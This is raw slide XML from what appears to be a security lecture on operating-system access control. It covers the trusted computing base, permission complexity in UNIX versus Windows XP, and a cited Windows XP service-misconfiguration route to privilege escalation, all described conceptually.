          <p:cNvPr id="18443" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65979301-F838-69E6-5F67-89102A082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1504950"/>
            <a:ext cx="1457325" cy="2173288"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 74"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF950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/>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="2400"/>
              <a:t> A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18444" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{927DB329-421E-5EEB-D157-4412E3B58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713" y="3902075"/>
            <a:ext cx="6335712" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 273"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="66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2400"/>
              <a:t>OS   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL"/>
              <a:t>(incl. file system)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18445" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7D20BF1-C5DA-B5E4-AD5D-E828B4128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238" y="1441450"/>
            <a:ext cx="1422400" cy="2173288"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 74"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF950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/>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="2400"/>
              <a:t> B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18446" name="Freeform 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57CB193E-71C1-1021-E4CD-2FDBEAB620B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4729163" y="1889125"/>
            <a:ext cx="2498725" cy="107950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 6943"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 298"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 6943"/>
              <a:gd name="T3" fmla="*/ 0 h 298"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
              <a:gd name="T6" fmla="*/ 0 w 6943"/>
              <a:gd name="T7" fmla="*/ 0 h 298"/>
              <a:gd name="T8" fmla="*/ 6943 w 6943"/>
              <a:gd name="T9" fmla="*/ 298 h 2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43" h="298">
                <a:moveTo>
                  <a:pt x="0" y="297"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6942" y="0"/>
                </a:lnTo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7" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05824271-DAA2-9026-1C20-207B7447C398}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3454400" y="3457575"/>
            <a:ext cx="442913" cy="1157288"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
              <a:gd name="T1" fmla="*/ 0 h 4065"/>
              <a:gd name="T2" fmla="*/ 0 w 1229"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
              <a:gd name="T6" fmla="*/ 0 w 1229"/>
              <a:gd name="T7" fmla="*/ 0 h 4065"/>
              <a:gd name="T8" fmla="*/ 1229 w 1229"/>
              <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                <a:moveTo>
                  <a:pt x="1228" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="4064"/>
                </a:lnTo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8" name="Vertical Scroll 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{638F74EA-9077-5AF7-1570-DDCE87D4B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931988"/>
            <a:ext cx="1811337" cy="2208212"/>
          </a:xfrm>
          <a:prstGeom prst="verticalScroll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en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>access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en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>control rights 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en-US">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>policies</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US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8449" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A2A9E49-B06B-0305-7313-917CEA940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032000"/>
            <a:ext cx="74136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8A791ED2-CABF-FE52-B1EB-15866A60E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Signs of OS access control</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20483" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0067383-F4C5-94D9-1565-66FF6C48B3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1258888"/>
            <a:ext cx="2990850" cy="2646362"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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0B4C741-2287-CD0E-CF10-E041E72825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60B412B-24D6-4A1B-A15B-4AA36DF69D5F}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/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ABE4CEDF-309A-49F1-B498-329301A43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4356100"/>
            <a:ext cx="4608512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AA34853E-6F89-4003-5711-991E23D06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258888"/>
            <a:ext cx="41814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C6CD68A-BDB5-38FF-D066-77398663F1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Problems with OS access control</a:t>
            </a:r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6B599-7822-CD9A-9E8C-53761AA2F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1116013"/>
            <a:ext cx="8642350" cy="577056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nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Size of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> TCB  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>                                                                                                    The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>Trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> Computing Base </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> OS access control is                             so there </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> 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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security flaws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>in the code.                                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="8001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nl-NL" sz="1800" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> safe assumption: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on a typical OS      (Linux, Windows, BSD, iOS, Android, ...) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> able to get root rights.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nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Too </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>much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complexity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>                                                                              The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>languages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express</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access control policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>are very complex, so people </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>  make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mistakes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/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000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nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not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enough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expressivity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>granularity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>                                                       Eg </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>cannot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> do access control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" err="1"/>
              <a:t>within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, as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>processes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>atomic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>’ units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endParaRPr lang="nl-NL" dirty="0"/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nl-NL" dirty="0" err="1"/>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>fundamental</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> conflict between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the need for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>expressivity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a: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nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                             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the desire to keep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>things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simple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4A710EA1-6BF6-62F6-0349-C0B2D48DAA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AD3272A0-FDD4-4F7B-9382-1474B1FB8B45}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11269" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5AF87B0-05DA-73D1-E403-2E6266112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138" y="868363"/>
            <a:ext cx="2159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en-US" sz="6000" b="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>huge</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1200" b="1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A1CC376-33EF-ABC0-BEF1-F878ADFC8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138" y="301625"/>
            <a:ext cx="8855075" cy="814388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2400"/>
              <a:t>Example: complexity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000"/>
              <a:t>(resulting in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000" i="1"/>
              <a:t>privilege escalation)  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="240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BD5D0-E9A1-36C2-C423-F302B06A6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dirty="0"/>
              <a:t>UNIX access control uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 permissions </a:t>
            </a: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en-GB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rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 categories of users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en-GB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owner,group,others</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for files &amp; directories</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.                                                          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Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>XP uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>30 permissions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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9 categories of users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>15 kinds of objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a: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nl-NL" dirty="0" err="1"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> flaw in XP access control, in 4 steps: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GB" sz="1800" dirty="0"/>
              <a:t>Windows XP uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>for privileged functionality (where UNIX uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1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setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>binaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0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GB" sz="1800" dirty="0"/>
              <a:t>The permission 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SERVICE_CHANGE_CONFIG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>changing the executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> associated with a service  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(say a printer driver)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GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> allows to change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the account under which it runs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>,               incl. to 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Local System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, which gives maximum root privileges.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GB" sz="1800" dirty="0"/>
              <a:t>Many configurations mistakenly grant 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SERVICE_CHANGE_CONFIG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>                 to all 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Authenticated Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>... 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C13B6CC-4899-D364-60FF-BF95DBFFAB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355445D-FB59-43C7-A7A2-A4991237CE29}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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291C20F-A8CF-DB2C-EFF0-A3F27F6C3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138" y="301625"/>
            <a:ext cx="8855075" cy="814388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2400"/>
              <a:t>Privilege escalation in Windows XP</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2400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AB6B053F-4493-C53A-07F2-DC806C2F87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nl-NL" altLang="en-US"/>
              <a:t>Unintended privilege escalation due to misconfigured access rights of standard software packages in Windows XP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" altLang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1400"/>
              <a:t>                                 [S. Govindavajhala and A.W. Appel, Windows Access Control Demystified, 2006]</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
